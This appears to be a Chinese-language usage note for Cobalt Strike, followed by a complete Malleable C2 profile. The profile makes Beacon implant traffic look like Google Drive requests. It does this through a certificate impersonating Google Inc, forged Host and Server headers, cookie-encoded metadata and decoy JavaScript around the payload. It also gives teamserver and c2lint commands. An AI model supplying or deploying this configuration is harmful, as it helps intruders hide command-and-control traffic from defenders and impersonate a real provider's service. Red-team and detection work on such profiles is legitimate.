Malleable-C2-Profiles
Beacon的HTTP的indicators由Malleable-C2-profile文件控制,关于Malleable-C2-profile,它是一个简单的配置文件,用来指定如何转换数据并将其存储在transaction中,转换和存储数据的相同配置文件也从transaction中提取和恢复。
使用方法:./teamserver [external IP] [password] [/path/to/my.profile]
对于profile文件可以通过cobalt strike软件包中的c2lint文件进行检查,建议第一次使用的profile文件都检查一遍。
检查方法:./c2lint [/path/to/my.profile]
PS
- 每次修改data.profile文件后,都要重启teamserver和listeners。。。不然要出问题
data.profile
# Make requests look like OneDrive web requests
#
# Author: @ChrisTruncer
#set https cert info
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
set sleeptime "30000";
set pipename "mojo.5688.8052.183894939787088877##";
set jitter "15";
set dns_idle "8.8.4.4";
set dns_sleep "0";
set maxdns "235";
http-get {
set uri "/scs/drive-static/js/3.14/";
client {
metadata {
base64;
prepend "OSID=";
header "Cookie";
}
header "Host" "drive.google.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US;q=0.3,en;q=0.2";
header "Accept-Encoding" "gzip, deflate";
header "DNT" "1";
}
server {
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "Cache-Control" "public, max-age=31536000";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Alternate-Protocol" "443:quic,p=1";
output{
prepend "try(";
prepend "O(L.Oa(),\"sy580\")";
prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");";
prepend ")catch(e)(_DumpException(e))";
prepend "try(";
prepend "O(L.Oa(),\"sy558\");";
prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");";
prepend ")catch(e)(_DumpException(e))";
prepend "try(";
append "var f2=function(a)(a=a.wa;return\"application/chromium-bookmark-folder\"==a||\"application/chromium-root-folder\"==a||\"application/vnd.google-apps.folder\"==a||\"application/vnd.google-apps.photoalbum\"==a||\"application/vnd.google-apps.rollupphotoalbum\"==a)";
append ",g2=function(a)(return a.ra),s8d=function(a)(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)(case \"all\":case \"docs-images\":case \"docs-images-and-videos\":case \"docs-videos\":case \"documents\":case \"drawings\":case \"folders\":case \"forms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadsheets\":case \"tables\":return!0)return!1); O(L.Oa(),\"ak477\")";
print;
}
}
}
http-post {
set uri "/drive/ui/1/";
client {
parameter "ui" "s3212f5452";
parameter "hop" "3620521";
parameter "start" "0";
header "Content-Type" "application/x-www-form-urlencoded;charset=utf-8";
id {
base64;
prepend "OSID=";
header "Cookie";
}
output{
base64;
print;
}
}
server {
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
output {
prepend "[[[\"apm\",\"";
append "\"]";
append ",[\"ci\",[]";
append "]";
append ",[\"cm\",[]";
append ",[]";
append "]";
append "],'dkkasdh56sa0d45e1f']";
print;
}
}
}